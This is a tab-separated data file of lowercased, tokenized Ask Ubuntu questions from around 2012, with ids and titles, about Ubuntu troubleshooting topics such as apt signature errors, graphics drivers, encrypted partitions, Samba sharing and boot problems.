210240	why does the badsig/ '' untrusted sources '' error recur forever ?	on at least a dozen occasions , i 've spent 2-3 hours figuring out how to get ubuntu 11.10-12.10 to either update or acquire software from software center , or both . i want to fix whatever is causing the badsig problem once and for all ; i 've wasted so much time trying to get this to work well enough that i can rely on it , but the same problem comes back after a couple weeks of normal updates and software center usage . do n't refer me to a standard posted solution on the web -- -whatever it is , i 've used it more times than you have . the question is n't whether i can get it to work right this afternoon . i can . the question is what is causing the problem to recur regularly across 3 releases . notice : i use this computer 4-5 hours per week and i do little on it . pdfs , latex , firefox , mendeley , and that 's it . i do n't constantly install new software , and i do n't fiddle with things unnecessarily .
210245	unity crashes with nvidia and any driver . workaround ?	is it possible to disable unity 3d in ubuntu 12.10 ? i had to use unity 2d with ubuntu 12.04 as unity would constantly crash and restart . this problem persists in 12.10 with any driver i select in the panel , including the open source driver .
210246	how can i force ubuntu to use font a instead font b in all applications and web pages ?	i am new in linux , my question simply is : how i can force ubuntu to use font a instead font b in all application and web page ? for example there is a web page that uses tahoma font , but i want my browser use ubuntu font istead tahoma automatically ,
210249	reboot only shuts down and does n't actually boot again	i 'm running a fresh install of ubuntu 12.04 server on an abmx rack mount server . when i attempt to reboot with sudo shutdown -r now , the machine just shuts down and does n't come back up without me manually pressing the power button . the output of last -x , runlevel ( to lvl 2 ) 3.2.0-29-generic wed oct 31 14:32 - 14:37 ( 00:05 ) reboot system boot 3.2.0-29-generic wed oct 31 14:32 - 14:37 ( 00:05 ) shutdown system down 3.2.0-29-generic wed oct 31 14:30 - 14:32 ( 00:02 ) runlevel ( to lvl 6 ) 3.2.0-29-generic wed oct 31 14:30 - 14:30 ( 00:00 ) this appears to show that the system rebooted , but it went dark ( no power lights , bios , etc ) and i had to go press the power button in order to make it boot back up . the machine does have some sort of intel boot agent that usually appears before the bios , i 'm wondering if it could be causing this . i 'm not sure what information is useful for debugging this , but i put the output of lshw in http : //pastebin.com/mby72ktq
210250	trouble on installing , getopt file missing	total noob here , but my work requires me working on ubuntu . i 'm trying to install a program , but this is what 's popping up . $ sudo perl makefile.pl warning : prerequisite getopt : :argvfile 1.11 not found . warning : prerequisite xml : :dom 1.44 not found . writing makefile for umph writing mymeta.yml $ having a little trouble understanding the `` install '' file as well . it just lists this : prerequisites required perl 5.10.1+ getopt : :argvfile xml : :dom recommended umph : :prompt for -- interactive additionally , to install : extutils : :makemaker installation notes uninstall earlier versions of umph if you have any installed . typical installation to install : perl makefile.pl make make install note that you can specify install prefix with install_base e.g . perl makefile.pl install_base=/usr/local any help would be great , thanks !
210252	mounting an encrypted partion error	using the disk utilities in ubuntu 11.04 , i had encrypted a partition with a passphrase . each time i used to click on the partition to mount , it used to ask me the passphrase and get mounted . all was fine , until i installed the 12.04 . after the installation , this encrypted partition , disappeared from the menu . fdisk -l /dev/sda shows the encrypted partition in the list /dev/sda7 298953648 488392064 94719208+ 7 hpfs/ntfs/exfat i tried the following commands to mount it . but they all gave following errors $ sudo cryptsetup luksdump /dev/sda7 device /dev/sda7 is not a valid luks device . $ ecryptfs-unwrap-passphrase /dev/sda7 passphrase : # i entered the correct passphrase here ... error : unwrapping passphrase failed [ -5 ] info : check the system log for more information from libecryptfs $ grep ecryptfs /var/log/syslog oct 31 22:43:51 benny ecryptfs-unwrap-passphrase : error attempting to open [ /dev/sda7 ] for reading nov 1 01:28:02 benny ecryptfs-unwrap-passphrase : error attempting to open [ /dev/sda7 ] for reading nov 1 01:29:06 benny ecryptfs-unwrap-passphrase : error attempting to open [ /dev/sda7 ] for reading i do n't understand why i am getting the `` device /dev/sda7 is not a valid luks device . '' could it be due to some corruption in partition table ? is there any way to recover this encrypted partition ? thanks indiajoe
210253	can not access windows drive from ubuntu 12.10 ( usb )	i have ubuntu 12.10 installed on my pen drive , in order for me to delete certain files of my windows ntfs drive ( i can not boot in to windows due to a file in there ) . however , when i click on the drive in the ubuntu file explorer , i am greeted with this unfortunate message : adding read acl for uid 9999 to /media/ubuntu failed : operation not supported
210264	less graphics power all the sudden ( intel hd 3000 )	i have a intel sandy bridge i5 with the hd 3000 graphics card . i used to be able to play urban terror and nexuiz comfortably with 85 and 60 frames per seconds until mid/end of october 2012 , the former even on a full hd display with that many frames . now i have around 30 to 45 on the smaller laptop screen and around 20 to 30 on the external monitor . did something happen to kubuntu 12.04 so that it has less graphics performance than previously ? update i looked into the system monitor and could not detect anything being at the maximum . the four cpu cores were pretty much bored , the 8 gb ram were filled with maybe 2 gb . and i ran intel_cpu_top and did not notice anything at its limit . see the output . after kernel bisecting i now did a kernel bisect and tried 3.2.0-23 , 3.2.0-27 , 3.2.0-29 and 3.2.0-30 and all had full graphics power . interestingly , i then had full power when i just booted back into the regular 3.2.0-32 kernel . this does not make sense to me âś the hardware lenovo thinkpad x220 intel ( r ) core ( tm ) i5-2520m cpu @ 2.50ghz intel hd 3000 graphics card ( in the cpu ) 8 gb ram kubuntu 12.04 lts
210265	how do i reset graphic drivers to installation default ? ( amd radeon hd 6400m )	i have a hp pavilion laptop with an amd radeon hd 6400m graphic card . when i upgraded from 12.04 to 12.10 all was fine and dandy , until i plugged in my tv via hdmi-cable . after a reboot , unity stopped working and i was getting all sorts of gpu-related error messages . well , i consulted google and while trying to fix this , i kind of went haywire , adding different repositories to install homebrewed solutions , upgrading and downgrading drivers from amd : s support page , tinkering with settings and so on . it did n't help . i finally removed all the mentioned repositories , purged all fglrx files and tried to remove all added drivers , but got some dkpg errors . the situation right now : unity does n't work , but gnome do . under 'additional drivers ' , i have the `` advanced micro devices [ amd ] nee ati : caicos [ radeon hd 6400m/7400m series ] '' driver . i 've tried both x.org , fglrx and fglrx-updates , but still , no unity . i 've given up trying to fix this myself , i 'd rather wait for a working update . is there a way to completely reset the graphic drivers to installation default , or do i have to re-install ubuntu 12.10 ? ( and before anyone mentions it , no , i do n't want to use gnome , i like unity and want it to work . )
210270	looking for an alternative to outrec for 12.10	i tried to install outrec on 12.10 , following any of the instructions available online . unfortunaly , the dependencies are broken and outrec would not install from the sources . is there any alternative to record all sounds coming through ubuntu ( as non-standard streamcasts or skype calls ) ?
210272	low-level 10-finger multi-touch data on the nexus 7 ?	i 'm considering getting a nexus 7 to do some multi-touch development on ubuntu in the run-up to 13.04 ( i.e. , now : - ) . what apis , /dev files , or protocols are available , or could be made available with not too much work on my part ? what data is available from the device ? the data i want to get my hands on is -- if i can -- the same as i get from /dev/uinput/event* from an apple magic trackpad , viz : positions of all touches ( could be as many as 10 simultaneous touches , but much more typically 6 or fewer ) their size/pressure ( in both x and y directions ) their angle their identity -- i.e . an integer that is somewhat reliably preserved across touch events , for as long as a finger does n't lift off the surface not all of this data is essential -- but the more of it there is , the merrier .
210275	how to know the number of pins on my laptop 's ram ?	i am thinking about upgrading my laptop 's ram.how can i get to know the number of pins on my ram without opening my laptop ? i ran this command sudo dmidecode -- type memory and got following info : handle 0x0019 , dmi type 17 , 27 bytes memory device array handle : 0x0017 error information handle : 0x001a total width : 64 bits data width : 64 bits size : 1024 mb form factor : sodimm set : none locator : dimm0 bank locator : bank 0 type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : ad00000000000000 serial number : 04008104 asset tag : unknown part number : 040404040404040404040404040404040404 can anyone help ?
210276	why only 1 cpu is used instead of 2 on ubuntu 11.10	i recently install ubuntu 11.10 64 bit on a workstation with 2 xeon e5620 but only 1 cpu , with 4 core and can be hyperthreading to 8 , displaying on system info . i refer to the documentation for supported hardware in ubuntu installation guide and it says smp is implemented automatically for my case . but it seems smp only works for detecting multi cores on 1 cpu instead of multi cpus . could anybody help me to figure out how to make those two cpus work ? i am relatively new users of ubuntu . thanks !
210280	how can i launch apps on the screen that the mouse cursor is on ?	i have two screens connected to my computer . i want applications to start on the screen my mouse cursor is on . how can i set this ?
210282	ubuntu 12.10 gnome shell title bar fonts	the font in my 12.10 gnome shell title bar is displaying some characters incorrectly ( see snapshot ) . this behavior happened once before , but logging back in fixed it . i installed some xfonts in order to fix a matlab bug ( xfonts-100dpi and xfonts-75dpi ) . after that , the title bar bug appeared and wo n't go away , even after logging in and out . any ideas ? screenshot :
210283	how to use fixedsys in the gnome terminal , or wherever monospaced fonts are required	i think that the fixedsys font is one of the most legible monospaced fonts for programming . it has zero antialiasing , with vertical lines mostly 2 pixels wide . close to ideal for current monitor dot pitches , in my eyes ( literally ) . here is a sample : after years of windows at home ( for family reasons ) and linux servers at work accessed through cygwin on windows ( for company policy reasons ) , with fixedsys as the shell and ide font , i have finally decided to switch to ubuntu at home . eclipse and gedit are no problem , they accept a corrected version of the fixedsys excelsior ttf font that you can find here at comment # 16 ( filename : fsex301-l2.ttf ) . but the gnome terminal only accepts monospaced fonts . although fixedsys excelsior is essentially monospaced , it contains larger glyphs ( mostly for eastern languages ) , and also some ligatures . since apparently all characters must have the same width for a font to be recognized as monospaced , fixedsys excelsior can not be selected in all those contexts where monospaced fonts are required , including gnome-terminal . so what is the easiest/cleanest way to use a fixedsys clone in contexts that only accept monospaced fonts ?
210287	what folder is this code signifying ?	i am trying to install openni on ubuntu and have found some decent looking instructions but i am not sure what i need to do for this one specific case . here are the instructions and here is the line that is tripping me up : cd openni/platform/linux/createredist/ chmod +x redistmaker ./redistmaker cd ../redist/openni-bin-dev-linux-x64-v1.5.2.23/ sudo ./install.sh i do n't know what folder the cd ../redist/openni-bin-dev-linux-x64-v1.5.2.23/ line is talking about and ca n't find it anywhere . does anyone know what this is ?
210289	ca n't access my ubuntu admin account	it just shows a black screen with words in it for a fraction of a second and then gets back to users screen ( where you choose your user ) . i tried to enter from another account and removed the password for the admin account , but it did n't work too , and then i could n't access my admin privileged places with my old password ? what should i do ? i tried to change my password from recovery but no success .
210291	git autocomplete is asking for a password , not sure why	i 'm running into an issue with autocomplete using git ... i am using ubuntu 12.10 and when i perform the following keystrokes g i t space bar tab i am presented with the error pseudo-terminal will not be allocated because stdin is not a terminal . and prompted for a password . i am not clear how to go about troubleshooting this error , i have tried uninstalling and reinstalling git to no avail . screenshot of terminal with error : diff between /root/.bashrc & ~/.bashrc 3a4 > export java_home= '' /usr/lib/jvm/java-6-sun '' 21a23,25 > java_home= '' /usr/lib/jvm/java-6-sun '' > export java_home > 51a56,63 > git_prompt ( ) > { > git_branch= $ ( git branch 2 > /dev/null | sed -n '/^\*/s/^\* //p ' ) > if [ -n `` $ git_branch '' ] ; then > echo `` ( $ git_branch ) '' > fi > } > 53c65 < ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' -- - > ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] $ ( git_prompt ) \ $ ' 55c67 < ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' -- - > ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w $ ( git_prompt ) \ $ ' 84a97,100 > # add an `` alert '' alias for long running commands . use like so : > # sleep 10 ; alert > alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' > 97,99c113,115 < # if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then < # . /etc/bash_completion < # fi -- - > if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then > . /etc/bash_completion > fi
210293	how can i remove a string of text from a files name ?	following this question i exported various svgs to pngs , but there is a little problem , all files include in their name the extensions .svg and .png as in file.svg.png . now what i 'd like to know is how can i remove the .svg string from the name of the file without going trough each file and do right-click > rename ? .
210299	unable to clean intsall	i have downloaded an iso file of ubuntu 12.10 x86 from the official website ( www.ubuntu.com ) . when i tried to install it , everything was going good until i got the error message something like the media you are using is probably corrupt or you have a hard disk error . it did't tell me what to do . i 'm already running windows 7 ultimate on my pc and it 's running fine . i have tested my hard disk for error and no errors were found by system mechanic pro 11 . after that , i tried to install my windows 7 on the same partition and it was successful . even now i am unable to install ubuntu .
210303	samgung galaxy s3 wo n't connect to macbook via usb . what should i do ?	i updated the software on my phone yesterday and since it was updated me phone will not connect to my macbook . it will charge but the android file transfering program will not open or recognize that my phone is connect to the usb
210305	from where can i install my nvidia drivers ?	i have read here and here that i should be able to install drivers . so i 'm finding the additional drivers menu . to install nvidia driver . i started looking for system - > administration and not finding it . i have an icon that says system settings and it has any option related to drivers . note : i am using ubuntu 12.10 .
210306	ubuntu 12.10 wireless shutdown issue	when i try to shutdown or restart my laptop it hangs at the point where it says `` * will now halt '' but never turns off . after some digging i have traced the root of the problem back to the wireless adapter . if i turn the wireless off before shutting down the system powers off correctly . the wirless card is a broadcom bcm4313 and the system appears to be using the broadcom sta wl driver . it currently has modules wl and bcma loaded but i have tried disabling both using `` modprobe -r '' and trying to use the other but the problem still occurs . can anybody advise me on what i can try next ?
210307	ca n't open the software center due to an error in a list file	i tried to remove webapps and after that i restarted the computer . now i ca n't launch software center or get any type of updates . this error appears : e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/webapps-preview-precise.list what should i do ?
210308	disable sounds in nautilus	with upgrade to quantal , nautilus makes some sounds when moving between folders and when closing folder properties window . i have all sounds disabled from system settings ( muted ) and did n't find any relevant options from nautilus preferences . how to remove them ? i will also consider hacks ( eg . replacing sound files with silent ones ) .
210319	alias apt-get to apt-fast ?	i use apt-fast , but often find myself copying commands from the internet , these all use apt-get . i am wondering if it is possible ( and what errors i might run into ) to alias it so any apt-get commands actually run apt-fast . the only issue i could see with this is if apt-fast uses apt-get internally anywhere ?
210324	how to install build-essential without the cd/dvd ?	i am trying to install the build-essential package per the instructions located here : https : //help.ubuntu.com/community/installingcompilers i get this error when i use the command apt-get install build-essential : media change : please insert the disc labeled 'ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) ' in the drive '/cdrom/ ' and press enter when attempting to install the package through the ubuntu software center , i get the following error : http : //i.stack.imgur.com/rmix5.png is there any way to install the package online only ?
210328	after 12.10 , no gui can authenticate for administration , such as software center	i upgraded to 12.10 , and now i ca n't use software center or network administration . it keeps giving me an authentication errors . when i check /var/log/auth.log , i see : oct 31 21:10:45 mike polkit-agent-helper-1 [ 4665 ] : pam_unix ( polkit-1 : auth ) : authentication failure ; logname= uid=1000 euid=0 tty= ruser=root rhost= user=root oct 31 21:10:51 mike polkit-agent-helper-1 [ 4667 ] : pam_unix ( polkit-1 : auth ) : authentication failure ; logname= uid=1000 euid=0 tty= ruser=root rhost= user=root i found a post which said to change my password , which i 've done ( both through the ubuntu settings gui tool , and through recovery mode . no avail . any suggestions ? tia m
210329	how do i burn ubuntu to dvd ? errors on mac and pc	trying to make a ubuntu 12.10 boot cd . on my pc - the selected disc image file is n't valid . on my macbook - ( not recognized )
210331	are the default keyboard shortcuts changeable and does the shortcut help change accordingly	are the keyboard shortcuts shown in the image changeable with a gui or terminal way and does the keyboard shortcut help ( the one that appears when you hold the super hey ) show the updated keyboard changes ?
210337	switching from unity to gnome -- lost top bar programs	in unity , i have some programs that sit on my top bar for applications like dropbox and weather indicator . in gnome shell , these disappear from the top bar and instead only appear on the bottom of the gnome shell . how do i get them back to the ever-present top bar ?
210339	weird titles and images ?	i just installed ubuntu 12.10 and i am brand new to the whole ubuntu thing . i installed it alongside windows and it opened up just fine but when i go through certain pages , like in the ubuntu software center , some of the pictures and text take on a strange staticy appearance . any idea whats wrong ?
210342	i ca n't run ubuntu 12.10 well on my sony p series	i installed ubuntu 12.10 on a sony vaio vgn-610t with w. vista . processor intel速 ( 1.33ghz ) intel速 system controller hub us15w chipset cache memory 512kb integrated into the second level bus speed 533mhz graphic card intel速 graphics media accelerator 500 memory ram 2gb ddr2 sdram hard disk 80gb it was installed correctly but it runs so very slow . i 'm new on this . there is something i can do to fix this ? or i 'll have to ( someway ) delete it from my computer ? thanks for your attention .
210343	dual boot ubuntu and windows 7 , i can only boot ubuntu through recovery mode	i want to become a new user of ubuntu , however this problem is preventing me . i have/had window 7 professional on my computer . i recently looked into getting linux . i discovered dual-booting and decided to give it a try . first i created a bootable flash drive with ubuntu 12.10 64 bit . i then followed the instructions on : https : //help.ubuntu.com/community/windowsdualboot after i finished going through the setup , my computer rebooted . after the reboot i was able to select ubuntu , advanced options for ubuntu , 2 memory tests , and windows 7 ( loader ) . so i chose windows ( honestly i was more concerned that i still had everything on windows at this point ) . i then rebooted again and selected ubuntu . when i selected ubuntu , the background screen of grub ( the crimson/burgandy color ) stayed for a few seconds then the screen went black : video here > > > http : //www.youtube.com/watch ? v=6kkcg4st7lg & feature=plcp i tried again with the same results . so i redid the ubuntu install differently using http : //www.liberiangeek.net/2012/10/dual-booting-windows-7-and-ubuntu-12-10-quantal-quetzal/ . after rebooting the same thing happened . after that i was stumped , so i figured it could hurt to experiment . after all i backed up my windows 7 stuff , and i have the software disk . i tried booting in recovery mode under `` advanced options for ubuntu '' and sure enough , after selecting continue to normal reboot it worked . so i updated and everything but when i rebooted it still would n't boot under ubuntu . it would always boot after recovery mode . so i try installing 12.10 32 bit ubuntu . the same problem keeps happening . i can still get to ubuntu through recovery mode . so i went online and tried using the terminal ( in ubuntu that i booted through recovery mode ) when i was using it i discovered that `` error in sitecustomize ; set pythonverbose for traceback : eoferror : eof read where not expected '' kept showing up . also i noticed a notification in the top right corner that looked like a do not enter sign . it said `` an error occured , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'ror in sitecustomize ; set pythonverbose for traceback : eoferror : eof read where not expected traceback ( most recent called last ) : file `` /usr/bin/lsb_release eoferror : eof read where not expected 39 ; 0 ' this usually means that your installed packages have unmet dependencies '' naturally i assumed this was what was causing my boot problems . i downloaded synaptic and updated everything and the error went away . but my boot problem was still a problem . so i go online find some things that have worked for others , like this > try to do this ( in your terminal : sudo nano /etc/default/grub look for : grub_cmdline_linux_default= '' quiet splash '' change it too : grub_cmdline_linux_default= '' quiet '' and update grub : sudo update-grub this should fix stuff . ) i did this and i still have the problem . sorry for the excessive explanation , please help .
210348	if i reinstall windows , can i save or recover my current wubi install ?	i installed ubuntu 12.04 using wubi installer in windows 8 , but now i want to reformat my computer to windows 7 . is there any way to preserve ubuntu 12.10 and reformat windows ?
210349	how do i make music and videos from an external hard drive show up on the lens filters ?	using ubuntu 12.04 lts with unity . i keep all my music and movies on an external hdd and i was wondering if there was a way to make the media on the hdd show up on the dash and its lens filters .
210351	nm-applet gone ?	nm-applet seems to have disappeared from my system . i am running 12.10 . here 's what i get when i check my package manager logs : ☁ ~ grep network-manager /var/log/dpkg.log 2012-10-06 10:37:08 upgrade network-manager-gnome : amd64 0.9.6.2-0ubuntu5 0.9.6.2-0ubuntu6 2012-10-06 10:37:08 status half-configured network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:37:09 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 configure network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status half-configured network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 remove network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-configured network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 install network-manager-gnome : amd64 0.9.6.2-0ubuntu6 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 configure network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status unpacked network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status half-configured network-manager-gnome : amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status installed network-manager-gnome : amd64 0.9.6.2-0ubuntu6 ☁ ~ unfortunately , i can not find network-manager-applet package at all : ☁ ~ apt-cache search network-manager-applet ☁ ~ here are the contents of /etc/apt/sources.list : ☁ ~ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal universe deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main ☁ ~ right now , i ca n't think of anything else . happy to provide more info upon request .
210352	vm running across multiple hardware	is it possible to deploy a single virtual machine instance to run across multiple physical hardware using ubuntu 's virtualization solution , namely kvm , maas , juju , etc ? imagine the following scenario , a virtual infrastructure with two physical servers of two core processors and 4 gb memory each . can i define a virtual machine use up to 3 core processors and 6 gb memory to run on this virtual infrastructure ? if this is possible , will it have any impact in terms of performance or is there any additional requirements on the hardware , eg . fibre channels between servers in order to avoid performance degradation ?
210353	how can i get geoip country analysis in rtorrent 0.9.2 ?	i 'd like rtorrent to determine what country my peers are from . this should be possible using geoip , but the only patch i found covers its implementation in rtorrent version 0.8.9 , instead of version 0.9.2 ( used in ubuntu 12.10 ) . how can i make rtorrent determine the peer 's country by ip ? please note that i know that frontends like rutorrent can do this . but i want the geoip analysis to be in rtorrent itself .
210355	webseeding transmssion client	i want to make a torrent file with web seed enable . where is can find this setting in transmission bitorrent client .
210363	is there any way to add a new location to the list of places where nltk looks for the wordnet corpus ?	i ca n't use the nltk wordnet lemmatizer because i ca n't download the wordnet corpus on my university computer due to access rights issues . i get the following error when i try to do so : ********************************************************************** resource 'corpora/wordnet ' not found . please use the nltk downloader to obtain the resource : > > > nltk.download ( ) searched in : - '/home/xx/nltk_data' - '/usr/share/nltk_data' - '/usr/local/share/nltk_data' - '/usr/lib/nltk_data' - '/usr/local/lib/nltk_data' ********************************************************************** when i had the same issue at home , i could resolve it by two ways : using nltk.download ( ) , the standard way and creating a new folder at location /home/xx/nltk_data and just pasting the corpus directory inside it . now at the university i only have access to /home/xx/bin and not /home/xx directly . so is there anyway i could paste the wordnet corpus into /home/xx/bin and then somehow make nltk look for the corpus in that folder ?
210365	how do you setup email notifications with thunderbird , for when the main app isnt open ?	how do you setup email notifications with thunderbird , for when the main app isnt open ? im trying to setup a way to get notifications of emails without having to have thunderbird open . would be nice to click the notification then thunderbird opens to read it . like a small background program running that checks for new emails every 5-10 minutes . is there such a setting ? thanks for any help ! alex
210368	samba shares ubuntu 12.04 and win 7 home network	i have managed to create a home network of sorts between my desktop with windows 7 and my laptop running precise pangolin using probably more than a dozen different tutorials i have read here and elsewhere on the net . i have installed and configured samba , made my folders `` shared '' and basically done everything i had to do multiple times and what i have is the following : firstly , i can see the shared windows folders from the ubuntu machine but i can only access the windows public folders - not the other shared folders . when i try and access the non-public shared folders , i get an error `` unable to mount drive '' . is that normal - is one not supposed to access folders that are not public folders , even if the are shared ? secondly , the ubuntu folders are not even visible from windows - it 's not in the windows network at all . ( maybe my procedure to make the ubuntu folders is flawed . the tutorials all say right click the folder and select the share option in properties , but you ca n't do it that way in 12.04 . ) so all i have is partial , one-way access between my two operating systems . can anyone shed some light on this ? a re-cap on the steps and procedures to establish the network would be appreciated . edit : i 've done some more tweaking and now , when i click on the shared win folders , i 'm asked for a password . i have not set a username and password . i do n't have a password for windows and my samba username and password donât work . i still ca n't see my ubuntu machine from windows - even with the ip address .
210372	what are disadvantages if i use ubuntu 10.10 ?	i tried to use the recent ubuntu version on my laptop , but the performance was n't that great . so i am now trying to use some older version such as ubuntu 10.10 on the machine and i know that 's out of support . if so , what are the disadvantages that i may have ? maybe some security issues ? thank you
210373	unable to install cursor theme	i tried to install this cursor theme on the latest version of ubuntu : http : //gnome-look.org/content/show.php/microzoa ? content=154458 it downloaded as a 7z file , so i extracted it , and copied all the extracted files to usr/share/icons folder . then i installed gnome-tweak-tool and i went to advanced settings > theme > icon theme ( and selected microzoa ) . but then nothing happened . i restarted computer and still the new cursor them does n't appear at all .
